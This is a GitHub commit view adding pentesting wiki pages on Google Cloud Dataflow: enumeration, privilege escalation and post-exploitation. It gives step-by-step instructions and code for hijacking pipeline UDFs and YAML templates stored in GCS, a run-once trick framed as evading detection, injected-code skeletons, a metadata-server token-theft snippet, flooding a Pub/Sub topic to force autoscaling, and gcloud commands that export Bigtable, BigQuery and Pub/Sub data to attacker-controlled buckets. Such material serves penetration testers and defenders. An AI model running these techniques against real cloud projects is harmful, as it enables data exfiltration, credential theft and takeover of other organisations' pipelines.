
Commit 1685887

Merge pull request #259 from Tamirye/dataflowrider
Authored by grte-ye-ti
2 parents fd262d7 + cd9939d

File tree

4 files changed: +327 -0 lines changed

src/SUMMARY.md

Lines changed: 3 additions & 0 deletions

@@ -95,6 +95,7 @@
 - [GCP - Cloud Shell Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-shell-post-exploitation.md)
 - [GCP - Cloud SQL Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.md)
 - [GCP - Compute Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-compute-post-exploitation.md)
+- [GCP - Dataflow Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-dataflow-post-exploitation.md)
 - [GCP - Filestore Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-filestore-post-exploitation.md)
 - [GCP - IAM Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-iam-post-exploitation.md)
 - [GCP - KMS Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation.md)

@@ -123,6 +124,7 @@
 - [GCP - Composer Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.md)
 - [GCP - Container Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.md)
 - [GCP - Dataproc Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-dataproc-privesc.md)
+- [GCP - Dataflow Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-dataflow-privesc.md)
 - [GCP - Deploymentmaneger Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-deploymentmaneger-privesc.md)
 - [GCP - IAM Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.md)
 - [GCP - KMS Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-kms-privesc.md)

@@ -176,6 +178,7 @@
 - [GCP - VPC & Networking](pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-vpc-and-networking.md)
 - [GCP - Composer Enum](pentesting-cloud/gcp-security/gcp-services/gcp-composer-enum.md)
 - [GCP - Containers & GKE Enum](pentesting-cloud/gcp-security/gcp-services/gcp-containers-gke-and-composer-enum.md)
+- [GCP - Dataflow Enum](pentesting-cloud/gcp-security/gcp-services/gcp-dataflow-enum.md)
 - [GCP - Dataproc Enum](pentesting-cloud/gcp-security/gcp-services/gcp-dataproc-enum.md)
 - [GCP - DNS Enum](pentesting-cloud/gcp-security/gcp-services/gcp-dns-enum.md)
 - [GCP - Filestore Enum](pentesting-cloud/gcp-security/gcp-services/gcp-filestore-enum.md)
src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-dataflow-post-exploitation.md

Lines changed: 55 additions & 0 deletions

# GCP - Dataflow Post Exploitation

{{#include ../../../banners/hacktricks-training.md}}

## Dataflow

For more information about Dataflow check:

{{#ref}}
../gcp-services/gcp-dataflow-enum.md
{{#endref}}

### Using Dataflow to exfiltrate data from other services

**Permissions:** `dataflow.jobs.create`, `resourcemanager.projects.get`, `iam.serviceAccounts.actAs` (over a SA with access to source and sink)

With Dataflow job creation rights, you can use GCP Dataflow templates to export data from Bigtable, BigQuery, Pub/Sub, and other services into attacker-controlled GCS buckets. This is a powerful post-exploitation technique when you have obtained Dataflow access, for example via the [Dataflow Rider](../gcp-privilege-escalation/gcp-dataflow-privesc.md) privilege escalation (pipeline takeover via bucket write).

> [!NOTE]
> You need `iam.serviceAccounts.actAs` over a service account with sufficient permissions to read the source and write to the sink. By default, the Compute Engine default SA is used if none is specified.

#### Bigtable to GCS

See [GCP - Bigtable Post Exploitation](gcp-bigtable-post-exploitation.md#dump-rows-to-your-bucket) ("Dump rows to your bucket") for the full pattern. Templates: `Cloud_Bigtable_to_GCS_Json`, `Cloud_Bigtable_to_GCS_Parquet`, `Cloud_Bigtable_to_GCS_SequenceFile`.
<details>

<summary>Export Bigtable to attacker-controlled bucket</summary>

```bash
gcloud dataflow jobs run <job-name> \
    --gcs-location=gs://dataflow-templates-us-<REGION>/<VERSION>/Cloud_Bigtable_to_GCS_Json \
    --project=<PROJECT> \
    --region=<REGION> \
    --parameters=bigtableProjectId=<PROJECT>,bigtableInstanceId=<INSTANCE_ID>,bigtableTableId=<TABLE_ID>,filenamePrefix=<PREFIX>,outputDirectory=gs://<YOUR_BUCKET>/raw-json/ \
    --staging-location=gs://<YOUR_BUCKET>/staging/
```

</details>
#### BigQuery to GCS

Dataflow templates exist to export BigQuery data. Use the appropriate template for your target format (JSON, Avro, etc.) and point the output at your bucket.
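As a sketch of what this can look like, the snippet below assembles a `gcloud dataflow flex-template run` invocation for Google's `BigQuery_to_Parquet` flex template. The template name, its parameters (`tableRef`, `bucket`, `numShards`), and all project/bucket names are assumptions to verify against the templates bucket before use, so the command is built into a variable and echoed for review rather than executed:

```bash
# Hypothetical sketch: export a BigQuery table to an attacker bucket with the
# BigQuery_to_Parquet flex template. Template name and parameters are
# assumptions - check gs://dataflow-templates-<REGION>/latest/flex/ first.
PROJECT="victim-project"
REGION="us-central1"
EXFIL_BUCKET="attacker-bucket"

CMD="gcloud dataflow flex-template run bq-export-$(date +%s) \
  --project=${PROJECT} --region=${REGION} \
  --template-file-gcs-location=gs://dataflow-templates-${REGION}/latest/flex/BigQuery_to_Parquet \
  --parameters tableRef=${PROJECT}:victim_dataset.victim_table,bucket=gs://${EXFIL_BUCKET}/bq-export,numShards=1"

# Echoed instead of executed so the command can be reviewed first
echo "$CMD"
```

Swap the template path and `--parameters` for whatever export template you actually find for your target format.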
#### Pub/Sub and streaming sources

Streaming pipelines can read from Pub/Sub (or other sources) and write to GCS. Launch a job with a template that reads from the target Pub/Sub subscription and writes to your controlled bucket.
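A hedged sketch of the idea, using the classic `Cloud_PubSub_to_GCS_Text` template (template name and its `inputTopic`/`outputDirectory`/`outputFilenamePrefix` parameters are assumptions to verify, and all names are placeholders); the command is echoed for review rather than executed:

```bash
# Hypothetical sketch: drain a Pub/Sub topic into an attacker bucket.
# Template name and parameters are assumptions - verify before use.
PROJECT="victim-project"
REGION="us-central1"
EXFIL_BUCKET="attacker-bucket"

CMD="gcloud dataflow jobs run pubsub-drain \
  --project=${PROJECT} --region=${REGION} \
  --gcs-location=gs://dataflow-templates-${REGION}/latest/Cloud_PubSub_to_GCS_Text \
  --staging-location=gs://${EXFIL_BUCKET}/staging/ \
  --parameters inputTopic=projects/${PROJECT}/topics/victim-topic,outputDirectory=gs://${EXFIL_BUCKET}/pubsub/,outputFilenamePrefix=msgs-"

# Echoed instead of executed so the command can be reviewed first
echo "$CMD"
```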
## References

- [Dataflow templates](https://cloud.google.com/dataflow/docs/guides/templates/provided-templates)
- [Control access with IAM (Dataflow)](https://cloud.google.com/dataflow/docs/concepts/security-and-permissions)
- [GCP - Bigtable Post Exploitation](gcp-bigtable-post-exploitation.md)

{{#include ../../../banners/hacktricks-training.md}}
src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-dataflow-privesc.md

Lines changed: 184 additions & 0 deletions

# GCP - Dataflow Privilege Escalation

{{#include ../../../banners/hacktricks-training.md}}

## Dataflow

{{#ref}}
../gcp-services/gcp-dataflow-enum.md
{{#endref}}

### `storage.objects.create`, `storage.objects.get`, `storage.objects.update`

Dataflow does not validate the integrity of UDFs and job template YAMLs stored in GCS. With write access to the bucket, you can overwrite these files to inject code, execute it on the workers, steal service account tokens, or alter data processing. Both batch and streaming pipeline jobs are viable targets. To attack a pipeline, replace the UDFs/templates before the job runs, within the first few minutes after launch (before the job workers are created), or while the job is running, before new workers spin up due to autoscaling.
**Attack vectors:**

- **UDF hijacking:** Python (`.py`) and JS (`.js`) UDFs referenced by pipelines and stored in customer-managed buckets
- **Job template hijacking:** Custom YAML pipeline definitions stored in customer-managed buckets
> [!WARNING]
> **Run-once-per-worker trick:** Dataflow UDFs and template callables are invoked **per row/line**. Without coordination, exfiltration or token theft would run thousands of times, causing noise, rate limiting, and detection. Use a **file-based coordination** pattern: check whether a marker file (e.g. `/tmp/pwnd.txt`) exists at the start; if it does, skip the malicious code; if not, run the payload and create the file. This ensures the payload runs **once per worker**, not once per line.
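The pattern is easy to verify locally. This self-contained sketch simulates a per-row UDF (the marker path, row data, and counter are made up for the demo) and shows the payload firing exactly once even though the transform runs for every row:

```python
# Demo of the file-based run-once coordination pattern. Nothing here is
# Dataflow-specific: the marker file lives on the worker's local disk, so
# each worker runs the payload once no matter how many rows it processes.
import os
import tempfile

MARKER = os.path.join(tempfile.gettempdir(), "pwnd-demo.txt")

payload_runs = 0

def payload():
    global payload_runs
    payload_runs += 1  # stand-in for exfiltration / token theft

def transform(line):
    # Called once per row/line, like a Dataflow UDF
    if not os.path.exists(MARKER):
        payload()
        with open(MARKER, "w", encoding="utf-8") as f:
            f.write("done")
    return line.upper()  # stand-in for the original UDF logic

if os.path.exists(MARKER):
    os.remove(MARKER)  # reset between demo runs

rows = [transform(l) for l in ["a", "b", "c", "d"]]
print(rows, payload_runs)
```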
#### Direct exploitation via gcloud CLI

1. Enumerate Dataflow jobs and locate the template/UDF GCS paths:

<details>

<summary>List jobs and describe them to get the template path, staging location, and UDF references</summary>

```bash
# List jobs (optionally filter by region or project)
gcloud dataflow jobs list --region=<region>
gcloud dataflow jobs list --project=<PROJECT_ID>

# Describe a job to get the template GCS path, staging location, and any UDF/template references
gcloud dataflow jobs describe <JOB_ID> --region=<region> --full --format="yaml"
# Look for: currentState, createTime, jobMetadata, type (JOB_TYPE_STREAMING or JOB_TYPE_BATCH)
# Pipeline options often include: tempLocation, stagingLocation, templateLocation, or flexTemplateGcsPath
```

</details>
2. Download the original UDF or job template from GCS:

<details>

<summary>Download the UDF file or YAML template from the bucket</summary>

```bash
# If the job references a UDF at gs://bucket/path/to/udf.py
gcloud storage cp gs://<BUCKET>/<PATH>/<udf_file>.py ./udf_original.py

# Or for a YAML job template
gcloud storage cp gs://<BUCKET>/<PATH>/<template>.yaml ./template_original.yaml
```

</details>
3. Edit the file locally: inject the malicious payload (see the Python UDF and YAML snippets below) and make sure the run-once coordination pattern is used.

4. Re-upload to overwrite the original file:

<details>

<summary>Overwrite the UDF or template in the bucket</summary>

```bash
gcloud storage cp ./udf_injected.py gs://<BUCKET>/<PATH>/<udf_file>.py

# Or for YAML
gcloud storage cp ./template_injected.yaml gs://<BUCKET>/<PATH>/<template>.yaml
```

</details>

5. Wait for the next job run, or (for streaming) trigger autoscaling (e.g. flood the pipeline input) so new workers spin up and pull the modified file.
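For step 5, one hedged way to force autoscaling on a Pub/Sub-fed streaming job is to hammer its input topic. The loop below only echoes the `gcloud pubsub topics publish` commands (the topic name is a placeholder) so they can be reviewed and then piped to `bash`:

```bash
# Hypothetical sketch: generate publish commands to flood a streaming
# pipeline's input topic and trigger autoscaling. Echoed, not executed.
TOPIC="victim-topic"  # placeholder: the streaming job's input topic
for i in $(seq 1 5); do
  echo "gcloud pubsub topics publish ${TOPIC} --message=flood-${i}"
done
```

In practice you would raise the iteration count and message size until new workers appear.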
#### Python UDF injection

If you want the worker to exfiltrate data to your C2 server, use `urllib.request` rather than `requests`: `requests` is not preinstalled on classic Dataflow workers.
<details>

<summary>Malicious UDF with run-once coordination and metadata extraction</summary>

```python
import os
import json
import urllib.request
from datetime import datetime

def _malicious_func():
    # File-based coordination: run once per worker.
    coordination_file = "/tmp/pwnd.txt"
    if os.path.exists(coordination_file):
        return

    # malicious code goes here
    with open(coordination_file, "w", encoding="utf-8") as f:
        f.write("done")

def transform(line):
    # Malicious code entry point - runs per line, but coordination ensures once per worker
    try:
        _malicious_func()
    except Exception:
        pass
    # ... original UDF logic follows ...
```

</details>
#### Job template YAML injection

Inject a `MapToFields` step with a callable that uses a coordination file. In YAML-based pipelines, use `requests` only if the template declares `dependencies: [requests]`; otherwise prefer `urllib.request`.

Add a cleanup step (`drop: [malicious_step]`) so the pipeline still writes valid data to the destination.

<details>

<summary>Malicious MapToFields step and cleanup in pipeline YAML</summary>
```yaml
- name: MaliciousTransform
  type: MapToFields
  input: Transform
  config:
    language: python
    fields:
      malicious_step:
        callable: |
          def extract_and_return(row):
              import os
              import json
              from datetime import datetime
              coordination_file = "/tmp/pwnd.txt"
              if os.path.exists(coordination_file):
                  return True
              try:
                  import urllib.request
                  # malicious code goes here
                  with open(coordination_file, "w", encoding="utf-8") as f:
                      f.write("done")
              except Exception:
                  pass
              return True
    append: true
- name: CleanupTransform
  type: MapToFields
  input: MaliciousTransform
  config:
    fields: {}
    append: true
    drop:
      - malicious_step
```

</details>
### Compute Engine access to Dataflow Workers

**Permissions:** `compute.instances.osLogin` or `compute.instances.osAdminLogin` (with `iam.serviceAccounts.actAs` over the worker SA), or `compute.instances.setMetadata` / `compute.projects.setCommonInstanceMetadata` (with `iam.serviceAccounts.actAs`) for legacy SSH key injection

Dataflow workers run as Compute Engine VMs. Access to a worker via OS Login or SSH lets you read SA tokens from the metadata endpoint (`http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token`), manipulate data, or run arbitrary code.
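As a sketch of the token grab (the actual fetch only succeeds from inside a GCP VM, so only the request construction runs here), the snippet builds the metadata-server request with the mandatory `Metadata-Flavor: Google` header using `urllib.request`, which is available on the workers:

```python
# Sketch: build (and, on a worker, send) the metadata-server token request.
# fetch_token() is only callable from inside a GCP VM; the demo only builds
# the request object.
import json
import urllib.request

TOKEN_URL = ("http://169.254.169.254/computeMetadata/v1/"
             "instance/service-accounts/default/token")

def build_token_request() -> urllib.request.Request:
    # The metadata server rejects requests lacking this header
    return urllib.request.Request(TOKEN_URL, headers={"Metadata-Flavor": "Google"})

def fetch_token(req: urllib.request.Request) -> str:
    with urllib.request.urlopen(req, timeout=5) as resp:
        return json.loads(resp.read())["access_token"]

req = build_token_request()
print(req.full_url)
```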
For exploitation details, see:

- [GCP - Compute Privesc](gcp-compute-privesc/README.md) - `compute.instances.osLogin`, `compute.instances.osAdminLogin`, `compute.instances.setMetadata`
## References

- [Dataflow Rider: How Attackers can Abuse Shadow Resources in Google Cloud Dataflow](https://www.varonis.com/blog/dataflow-rider)
- [Control access with IAM (Dataflow)](https://cloud.google.com/dataflow/docs/concepts/security-and-permissions)
- [gcloud dataflow jobs describe](https://cloud.google.com/sdk/gcloud/reference/dataflow/jobs/describe)
- [Apache Beam YAML: User-defined functions](https://beam.apache.org/documentation/sdks/yaml-udf/)
- [Apache Beam YAML Transform Reference](https://beam.apache.org/releases/yamldoc/current/)

{{#include ../../../banners/hacktricks-training.md}}
src/pentesting-cloud/gcp-security/gcp-services/gcp-dataflow-enum.md

Lines changed: 85 additions & 0 deletions

# GCP - Dataflow Enum

{{#include ../../../banners/hacktricks-training.md}}

## Basic Information

**Google Cloud Dataflow** is a fully managed service for **batch and streaming data processing**. It enables organizations to build pipelines that transform and analyze data at scale, integrating with Cloud Storage, BigQuery, Pub/Sub, and Bigtable. Dataflow pipelines run on worker VMs in your project; templates and User-Defined Functions (UDFs) are often stored in GCS buckets. [Learn more](https://cloud.google.com/dataflow).

## Components

A Dataflow pipeline typically includes:

- **Template:** YAML or JSON definitions (and Python/Java code for flex templates) stored in GCS that define the pipeline structure and steps.
- **Launcher (Flex Templates):** A short-lived Compute Engine instance may be used for Flex Template launches to validate the template and prepare containers before the job runs.
- **Workers:** Compute Engine VMs that execute the actual data processing tasks, pulling UDFs and instructions from the template.
- **Staging/Temp buckets:** GCS buckets that store temporary pipeline data, job artifacts, UDF files, and flex template metadata (`.json`).
## Batch vs Streaming Jobs

Dataflow supports two execution modes:

- **Batch jobs:** Process a fixed, bounded dataset (e.g. a log file or a table export). The job runs once to completion and then terminates; workers are created for the duration of the job and shut down when done. Batch jobs are typically used for ETL, historical analysis, or scheduled data migrations.
- **Streaming jobs:** Process unbounded, continuously arriving data (e.g. Pub/Sub messages or live sensor feeds). The job runs until explicitly stopped. Workers may scale up and down; new workers can be spawned by autoscaling, and they pull pipeline components (templates, UDFs) from GCS at startup.
## Enumeration

Dataflow jobs and related resources can be enumerated to gather service accounts, template paths, staging buckets, and UDF locations.

### Job Enumeration

To enumerate Dataflow jobs and retrieve their details:

```bash
# List Dataflow jobs in the project
gcloud dataflow jobs list
# List Dataflow jobs (by region)
gcloud dataflow jobs list --region=<region>

# Describe a job (includes service account, template GCS path, staging location, parameters)
gcloud dataflow jobs describe <job-id> --region=<region>
```

Job descriptions reveal the template GCS path, staging location, and worker service account, which is useful for identifying the buckets that store pipeline components.
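Since the interesting values are all `gs://` URIs, a small helper can pull them straight out of the `describe` output; the sample text below is made up for illustration:

```python
# Helper sketch: extract every GCS URI from `gcloud dataflow jobs describe`
# output to quickly spot staging buckets, template paths, and UDF files.
import re

def extract_gcs_uris(describe_output: str) -> list[str]:
    # gs://bucket/path tokens, stopping at whitespace, quotes, or commas
    return sorted(set(re.findall(r"gs://[^\s'\",]+", describe_output)))

# Fabricated sample resembling describe output
sample = """
environment:
  tempStoragePrefix: gs://df-staging-bucket/tmp
sdkPipelineOptions:
  stagingLocation: gs://df-staging-bucket/staging
  templateLocation: gs://df-templates-bucket/templates/job.yaml
"""

print(extract_gcs_uris(sample))
```

Pipe real output in with `gcloud dataflow jobs describe <job-id> --region=<region> --full --format=yaml`.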
### Template and Bucket Enumeration

Buckets referenced in job descriptions may contain flex templates, UDFs, or YAML pipeline definitions:

```bash
# List objects in a bucket (look for .json flex templates, .py UDFs, .yaml pipeline defs)
gcloud storage ls gs://<bucket>/

# List objects recursively
gcloud storage ls gs://<bucket>/**
```
## Privilege Escalation

{{#ref}}
../gcp-privilege-escalation/gcp-dataflow-privesc.md
{{#endref}}

## Post Exploitation

{{#ref}}
../gcp-post-exploitation/gcp-dataflow-post-exploitation.md
{{#endref}}

## Persistence

{{#ref}}
../gcp-persistence/gcp-dataflow-persistence.md
{{#endref}}

## References

- [Dataflow overview](https://cloud.google.com/dataflow)
- [Pipeline workflow execution in Dataflow](https://cloud.google.com/dataflow/docs/guides/pipeline-workflows)
- [Troubleshoot templates](https://cloud.google.com/dataflow/docs/guides/troubleshoot-templates)

{{#include ../../../banners/hacktricks-training.md}}
